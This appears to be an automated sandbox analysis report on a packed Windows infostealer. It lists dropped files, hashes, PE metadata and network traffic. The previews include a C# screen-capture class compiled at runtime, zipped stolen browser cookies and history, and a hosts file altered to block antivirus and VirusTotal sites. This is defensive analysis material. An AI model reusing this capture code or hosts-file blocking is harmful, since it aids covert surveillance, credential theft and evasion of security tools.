                                                                                    SHA-512:92B74BD23CAD1B9823A6C24A45C5B8BD0C2273A6DFCAB764DF6BE349876C225B95C8ED96EBE910A361289B09F5BDB37A7DF8FC782BFA33B06BFF2F6E079D7F6C
                                                                                    Malicious:false
                                                                                    Preview:L....Kcg.............debug$S........d...................@..B.rsrc$01........X.......H...........@..@.rsrc$02........P...R...............@..@........S....c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP................!s..z.+q....:............3.......C:\Users\user\AppData\Local\Temp\RES41CB.tmp.-.<....................a..Microsoft (R) CVTRES.s.=..cwd.C:\Users\user\AppData\Local\Temp\PEHPVXinsv.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.2.s.g.n.v.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t.
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):652
                                                                                    Entropy (8bit):3.0966927975522616
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhSqak7YnqqiSbPN5Dlq5J:+RI+ycuZhNOqakSpbPNnqX
                                                                                    MD5:21730C197A0B2B710B181FA53ADE85F3
                                                                                    SHA1:E730AB4B938F2EF166E9F5F53007DB532C6BEF17
                                                                                    SHA-256:400776FABFEB0DA9856A4661806ACF558EC09BD4159219D44794F9B6D825EB8A
                                                                                    SHA-512:304D1A5AAC01FC140D21BD64A398F81E601B4483B3DE3FA2D3B2D5F089947AB7BA30417C072FD519ED4C206B733B2ACFD799DF309588048BDE0728BC7D1B3A5F
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.2.s.g.n.v.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.1.2.s.g.n.v.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1004
                                                                                    Entropy (8bit):4.154581034278981
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                    MD5:C76055A0388B713A1EABE16130684DC3
                                                                                    SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                    SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                    SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                    Malicious:false
                                                                                    Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):605
                                                                                    Entropy (8bit):5.323393644049749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikywZB4WZEmwZB1:V3ka6KOkqeFkywZrEmwZv
                                                                                    MD5:BA10CCAD3FD6F8CA70298C32586A575F
                                                                                    SHA1:AC10A4453F85B5D616F73373DD456ECE4EAA00B7
                                                                                    SHA-256:AAE388F34FB58B48189654AF5B90BEF21655976E278A5A3A6B3B6BA6C53D1D52
                                                                                    SHA-512:593BE00261B7E493692775A6194565E4C65AA87B73AF22898CD803E7B6C8189FC904019968A4DD1417909909738698DC8537B0FB8D8BE32BF80AEB91F98DEE5D
                                                                                    Malicious:true
                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.0.cs"
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4096
                                                                                    Entropy (8bit):3.1537299251895012
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6G7oEAtf0KhzBU/nf6mtJwN0NXpW1ulOqa3pRq:2Nz0CmYON3RK
                                                                                    MD5:2395C719B4DEF0B8A6593525F35392AB
                                                                                    SHA1:E7FEF003E5459D196DEBF90F289B049AF812B3A5
                                                                                    SHA-256:8C5614EF9B771B153AA3793F6B05F449F0EFD7316DC1A1D2F6AE41BCD0432E39
                                                                                    SHA-512:D23A32C61A4B2419730834DDB941CBEA29802E65A5FA3E534DBDAF7FDD1E2B5223DB1F2CAA9CA7A6506A1DBAC24BBDD1A4457A4D357B9A1D8577F58CE5E2D813
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kcg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (705), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):1126
                                                                                    Entropy (8bit):5.413687180581488
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:KTwZWId3ka6KOkqeFkywZrEmwZWKax5DqBVKVrdFAMBJTH:mwZWkka6NkqeFkywZrEmwZWK2DcVKdBt
                                                                                    MD5:8F27AF399FF86F27A4EBB9DAEF59FAA5
                                                                                    SHA1:CCE91532E705263402CACFD1F27ED47ED7073C67
                                                                                    SHA-256:E11B8657B4A56E1ED9811B2D803A69854764DC8C19E8DBA618D704554C0ACAF5
                                                                                    SHA-512:481978ED8267E30FA7BB34E493DA9E2CC01F39FCA8F84B38A60530C4EE8DF2473193307CF659CE30E39299F27BA2053B3EC4275B8277DD7033C009B6423BD965
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\PEHPVXinsv> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. F
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):287
                                                                                    Entropy (8bit):5.773243328858008
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Pk3rsSQSvxbVCk3r4zP9JcrDSLukrTSSIGDRmEksDV0n:c7fvv7v74TAHSLLXAGDR+t
                                                                                    MD5:3F798C5E99E84C7286227DEC636D6677
                                                                                    SHA1:5A4E308F6F6AEFA774246264738D5153A756B039
                                                                                    SHA-256:61CDE7840A0C068AAF8DAD3B6DE5CBA28BACAD13F5CE9402F7E01B2B0034089D
                                                                                    SHA-512:0ECAE6AB4D978C355A62DB8B49314464EC925A8B9F651E7C19F677410EA711DCBA284F6A0714415A35121C375EC6D695DC521A8CA4D81BD7681EB99B9671ED4B
                                                                                    Malicious:false
                                                                                    Preview:.google.com.TRUE./.FALSE.13343562100717560.1P_JAR.2023-10-05-09..google.com.TRUE./.FALSE.13356781299717612.NID.511=k9tT3q7Yfh1nx_FSl06F5UE_vdaFQreiGKe1aDN83MeveD7PL1RZXva4s-nFc9waQi9LtKavuTIba8MUkoGu58E8E81gwB_TWJ4Ng-LfCvzhem7rNrhZQ2aGvJZ9g2TYhqx2W2O4E7uHQzPk3vuLvMLxFXZsqE6NdAViQDECGpo.
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:Unicode text, UTF-8 text
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):2.3385973091790886
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KqXY5jmGPHA9lfMJJEFArSLvIJiMhKVX3L2WdeXFn:KqXpG/CF0EFAGLciA8deX9
                                                                                    MD5:881ECE97F9BA3CE6769E6E816D2FF6D9
                                                                                    SHA1:2F8C4025E1AF81576204D2C0C6C18F6A058A94D2
                                                                                    SHA-256:D10D488C645DD8076ED7B5079388EA5B4B0543FA1F7A9F484D613ACB72900D8B
                                                                                    SHA-512:98DFC51D4CA1D81EE8E435DED053FD7ABC122C4F55AB1DAFC9D2F23DCC675B04ADC25D374F3FA65344CBB714EF6C247A16D9CF1B483F27BD80C3848E7A8BAFA9
                                                                                    Malicious:false
                                                                                    Preview:Title URL .Firefox Privacy Notice . Mozilla https://www.mozilla.org/en-US/privacy/firefox/ .
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):701
                                                                                    Entropy (8bit):6.481675380365101
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:5j3kCxrbNcLDleNvofc9zxJIxfFNg+I1+3v3HgUk/iJYk:93NhOLDletI+s3v35h2k
                                                                                    MD5:F8D249B6A1F3EF3B31E20B86B66A60E5
                                                                                    SHA1:772156651F5F2A47F459F7A1C681DC034C4E4920
                                                                                    SHA-256:1A328E5E8258181BF05A027C04891CB81D1FB3C5F7C5320D3A1ED1CB07E0F175
                                                                                    SHA-512:9AFFF637991258435632F120212156D330F3128FB534D3D8C531013AAF2433E4439A2101E75789B3C4D14725BB229A3F7CB14979A2A808C4D0E30E81B0DB9CD3
                                                                                    Malicious:false
                                                                                    Preview:PK............................user\Chrome\Default\cookies.txt|.Kr.0...u..6.BH...JB.HE.*.&......x.....U.T'..6g....!=0.........8.0.Y9..........,{.y.q.DJ.<...Q....Q>rz.}......4[....n.L..8.t.....X{........<&.......$-.J(....W.0.....W......"#6..BV$.....W.x...fG.[....~UQ..|..X.........PK...?I.........PK........................1...user\Firefox\3nxxd8pi.default-release\history.txt..,.IU......RB..r.,JM.P.(.,KL.T../.LNUx.0E.7.*3''...P.QRRPl.._^^....._........_.1^?.b.>.S.......PK..d.v|b.......PK...............?I...........................user\Chrome\Default\cookies.txtPK..............d.v|b.......1.............:...user\Firefox\3nxxd8pi.default-release\history.txtPK....................
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3469824
                                                                                    Entropy (8bit):7.999928725904616
                                                                                    Encrypted:true
                                                                                    SSDEEP:49152:gikXNdLQ4Vfk5AzqIaoiZ8MbSBSFVAYFH9h1LGbExIVOJdWAZ5N0kWfNYWMizPat:fqg9OCR8MbSBUAYFHBBvZlWllrTaGq
                                                                                    MD5:2B344D8644F0D502C4C8370EF8674A51
                                                                                    SHA1:D14F20EAF8EA75D6F10C85E2B18FB1D0EE8781DA
                                                                                    SHA-256:BC1B77F9680B9028EFD499E3E741D46DB003F5470A8B61D21E445EAEB7141045
                                                                                    SHA-512:662EDF49F1F008205555CCD39A3B830AE5F42EF9B4B05BD8D8E8432F21ABA38EED718AD8C7B705A95A6A1C7C775E07A2F88AB81CFB8D249E458B055C6F89F8D4
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........T........".......4......po.Pb....o...@...........................................`... ..............................................p..................T...................................................................................................UPX0.....po.............................UPX1......4...o...4.................@...UPX2.........p........4.............@...4.24.UPX!.$..2.m.Yl=.K....4..V.....U<.........Pm.|E...B..EBW1.3.y..Y'...S..#x.TH.*...d.......m.+..1...3....Y`...*.........(:....W.'.-Sd.l.*.?.(.KI:9Ga.....q..|....F..N. ....8.u..u5Z..a...FIO.)..zi.....5.....)N.*^.^..&..r.9..:...=..<....O..3...K../o...J.}..l.@W.X..P.j..E&C..!.....I.&.....uQW..I...."...^u..&6...Zv........h....$.O.kW...Zx.XQw-....lF.%&..j...........M..&"....n.bb.$>..b..n.....U..|r.y(............k..N...@...a.l..z9..R.|..(...r.....?.ST..J..Q..&..
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2165
                                                                                    Entropy (8bit):4.522303506272206
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:vDZhyoZWM9rU5fFcqwUYi1iBopn2g2+oGSVy2w23c4Zezwd0/a7S4qqBLE97aFsL:vDZEurK9UUlcBsn2g2+lSw2w23c4ZezT
                                                                                    MD5:BD87D7EA7B5DBD74CC0B0E38477F6079
                                                                                    SHA1:63C28862A5D0052F2425A8B45AC0F66572A02F33
                                                                                    SHA-256:EB97F9588DFFD94BC3B06EAED77751593F32F9E0D09A9B7868746AB16E7F45F1
                                                                                    SHA-512:1DD93CD24870D9716980B38145A1DC23F8EFB5DB93DB9D5223C1D0984CD8E064C6C99B6833F7066392BA79D887AC37F0BA3D8D5CD657B56967D51A2836C52AF0
                                                                                    Malicious:true
                                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com.0.0.0.0 avast.com.0.0.0.0 www.avast.com.0.0.0.0 totalav.com.0.0.0.0 www.totalav.com.0.0.0.0 scanguard.com.0.0.0.0 www.scanguar
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with very long lines (381), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):392
                                                                                    Entropy (8bit):5.237198052265355
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:0k4+DgBWg/sK2vAPKZC92/4jJpBVd+min79eEno:0k4+tgsZS2kX+TxXo
                                                                                    MD5:7F599F4277A8C4152074D773FD3AB801
                                                                                    SHA1:D19F04FD5E944642D6C5D684EBAB2F42C1177197
                                                                                    SHA-256:A3639AF5E23464FC391DAE127FD5493F02C8178068A35866D9C7FDD35DCD623F
                                                                                    SHA-512:CCE2C7C5240EA0D59C9C01C3AB3E3D7B4E0B026D5385B330D5B60D45B01D4D9CF5662B22F445154EE7368DF09D0D6C863D7019D20CDDFBC6E7C533774B46707B
                                                                                    Malicious:false
                                                                                    Preview:#< CLIXML..<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Entropy (8bit):7.999928725904616
                                                                                    TrID:
                                                                                    • Win64 Executable Console (202006/5) 81.26%
                                                                                    • UPX compressed Win32 Executable (30571/9) 12.30%
                                                                                    • Win64 Executable (generic) (12005/4) 4.83%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.81%
                                                                                    • DOS Executable Generic (2002/1) 0.81%
                                                                                    File name:WdlA0C4PkO.exe
                                                                                    File size:3'469'824 bytes
                                                                                    MD5:2b344d8644f0d502c4c8370ef8674a51
                                                                                    SHA1:d14f20eaf8ea75d6f10c85e2b18fb1d0ee8781da
                                                                                    SHA256:bc1b77f9680b9028efd499e3e741d46db003f5470a8b61d21e445eaeb7141045
                                                                                    SHA512:662edf49f1f008205555ccd39a3b830ae5f42ef9b4b05bd8d8e8432f21aba38eed718ad8c7b705a95a6a1c7c775e07a2f88ab81cfb8d249e458b055c6f89f8d4
                                                                                    SSDEEP:49152:gikXNdLQ4Vfk5AzqIaoiZ8MbSBSFVAYFH9h1LGbExIVOJdWAZ5N0kWfNYWMizPat:fqg9OCR8MbSBUAYFHBBvZlWllrTaGq
                                                                                    TLSH:31F5333BBBCBB699EC9820BEE2ED519F1E91477D46839FA703318A426D7D116204D40F
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........T........".......4......po.Pb....o...@...........................................`... ............................
                                                                                    Icon Hash:00928e8e8686b000
                                                                                    Entrypoint:0xe46250
                                                                                    Entrypoint Section:UPX1
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows cui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:1
                                                                                    File Version Major:6
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:6ed4f5f04d62b18d96b26d6db7c18840
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa47000 | 0x9c | UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xa0c000 | 0x1bc54 | UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x6f7000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x6f8000 | 0x34f000 | 0x34ee00 | e4c9a87eaabc5d668f2bca6c44d17477 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX2 | 0xa47000 | 0x1000 | 0x200 | 0d026308cf9c08bebb8f207723307c16 | False | 0.1953125 | data | 1.3719135890817398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 21:25:03.015376091 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:03.015450001 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:03.015532970 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:03.016215086 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:03.016227007 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.237970114 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.241945982 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.241970062 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.242119074 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.242124081 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.243999958 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.244112968 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.345619917 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.345851898 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.345909119 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.394890070 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.394917965 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.442888021 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.698540926 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.698612928 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.698685884 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.698960066 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.699012995 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:04.699043989 CET | 49707 | 443 | 192.168.2.9 | 104.26.12.205
Dec 18, 2024 21:25:04.699059963 CET | 443 | 49707 | 104.26.12.205 | 192.168.2.9
Dec 18, 2024 21:25:05.566143990 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:25:05.685866117 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Dec 18, 2024 21:25:05.685976982 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:25:05.686403990 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:25:05.806083918 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Dec 18, 2024 21:25:06.791457891 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Dec 18, 2024 21:25:06.842977047 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:25:18.303844929 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:25:18.423572063 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Dec 18, 2024 21:25:18.623378992 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Dec 18, 2024 21:25:18.758171082 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:25:48.664314985 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:25:48.783843040 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Dec 18, 2024 21:26:10.263999939 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Dec 18, 2024 21:26:10.264070988 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:26:10.269349098 CET | 49708 | 80 | 192.168.2.9 | 208.95.112.1
Dec 18, 2024 21:26:10.388997078 CET | 80 | 49708 | 208.95.112.1 | 192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 21:25:02.871206045 CET | 49291 | 53 | 192.168.2.9 | 1.1.1.1
Dec 18, 2024 21:25:03.008239985 CET | 53 | 49291 | 1.1.1.1 | 192.168.2.9
Dec 18, 2024 21:25:05.427726030 CET | 49621 | 53 | 192.168.2.9 | 1.1.1.1
Dec 18, 2024 21:25:05.565123081 CET | 53 | 49621 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 21:25:02.871206045 CET | 192.168.2.9 | 1.1.1.1 | 0x29e | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
